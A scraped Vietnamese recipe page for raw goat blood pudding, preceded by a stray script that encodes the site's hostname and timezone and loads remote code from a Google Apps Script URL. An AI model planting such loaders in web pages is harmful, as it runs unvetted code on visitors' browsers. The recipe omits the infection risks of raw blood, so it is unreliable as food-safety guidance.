var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Hướng dẫn cách đánh tiết canh dê ngon chuẩn không cần chỉnh

Học cách đánh tiết canh dê cực chuẩn cùng Bách hóa XANH để trổ tài trong những dịp đặc biệt với bạn bè và người thân trong bài viết hôm nay.

Tiết canh dê

Chuẩn bị 5 phút Chế biến 15 phút Dành cho 5 người

Tiết canh dê là một món khá kén người ăn nhưng lại rất bổ dưỡng. Nếu bạn đang “ngại” hay sợ mùi thì hãy thử cách đánh tiết dê ngon, chuẩn không cần chỉnh sau đây cùng Bách hóa XANH.

1 Nguyên liệu đánh tiết dê

  • 300 ml tiết dê
  • 1 cái lưỡi dê
  • 200g sụn dê
  • 2 củ hành tây
  • ½ củ gừng
  • 1 cây sả
  • 30g đậu phộng rang
  • 15g mè rang
  • 1 – 2 trái chanh
  • Gia vị: nước mắm, muối

Nguyên liệu đánh tiết canh dêNguyên liệu đánh tiết canh dê

Mẹo hay:Bạn phải chọn tiết dê tươi, được lấy từ con dê khỏe mạnh, không bệnh tật. Khi chọc tiết dê bạn cần dứt khoát, đưa con dao vào sâu trong phần mạch máu hồng thì mới lấy được nhiều tiết, tiết màu đỏ tươi, đẹp mắt và chất lượng.

2 Cách đánh tiết dê

Bước 1 Sơ chế nguyên liệu

Trụng sơ sụn dê và lưỡi dê với nước sôi, ½ củ gừng, 1 cây sả đập dập trong 7 phút rồi vớt ra, dùng dao cạo sạch bợn trắng rồi rửa sạch lại bằng nước muối pha loãng, để ráo.

Lấy 2 củ hành tây đem đi nướng rồi băm nhuyễn.

Sơ chế nguyên liệuSơ chế nguyên liệu

Bước 2 Băm thịt dê

Băm nhuyễn phần sụn dê và lưỡi dê với hành tây đã nướng thơm. Trong lúc băm bỏ bớt phần xương dê đi bạn nhé!

Băm thịt dêBăm thịt dê

Bước 3 Xào thịt dê

Xào thịt dê đã băm với hành tây cùng ½ muỗng cà phê nước mắm với lửa lớn trong 3 phút cho thịt săn lại. Chia phần thịt dê đã xào ra từng chén.

Xào thịt dêXào thịt dê

Bước 4 Pha tiết canh dê

Lấy 1 cái tô, cho vào tô 300ml tiết dê và 12 vá múc canh nước lọc rồi khuấy đều. Múc tiết dê đã pha vào các chén có thịt dê xào.

Rắc đậu phộng và mè rang lên trên lượng tùy thích lên trên chén tiết canh dê rồi vắt 1 ít chanh là đã hoàn thành rồi.

Pha tiết canh dêPha tiết canh dê

3 Thành phẩm

Tiết canh dê có màu đỏ đẹp mắt, không còn mùi dê hôi mà bạn “ngại” ăn, đậu phộng cùng mè rang thơm ngon, làm dậy mùi món ăn. Thịt dê mềm mềm, hơi dai giòn nhẹ, vô cùng lôi cuốn.

Thành phẩm tiết canh dêThành phẩm tiết canh dê

Cách đánh tiết dê mà Bách hóa XANH giới thiệu đến bạn thật dễ đúng không nào. Bạn sợ nấu ăn không ngon, không đảm, đừng lo, hãy đón đọc các bài viết của chúng tôi để “bỏ túi” thêm nhiều bí kíp làm bếp nữa nhé!

Mua đậu phộng ngon tại Bách hóa XANH để đánh tiết canh dê đúng điệu nhất:

Bách hóa XANH